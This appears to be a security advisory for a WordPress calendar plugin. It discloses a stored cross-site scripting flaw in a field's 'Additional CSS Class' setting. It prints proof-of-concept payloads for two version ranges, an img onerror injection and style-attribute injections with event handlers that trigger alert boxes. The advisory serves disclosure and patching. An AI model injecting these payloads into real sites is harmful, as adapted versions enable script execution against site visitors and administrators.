The plugin does not sanitise and escape a settings of its Calendar fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed.
Proof of Concept
Create/edit a calendar, and put the following payload in the "Additional CSS Class" settings of a field:
v < 1.3.55: "><img src=x onerror=alert(/XSS/)><"
v < 1.3.56: backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//, frontend: " style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//
The XSS will be triggered in the post/page where the Calendar is embed, as well when accessing the field settings when editing the calendar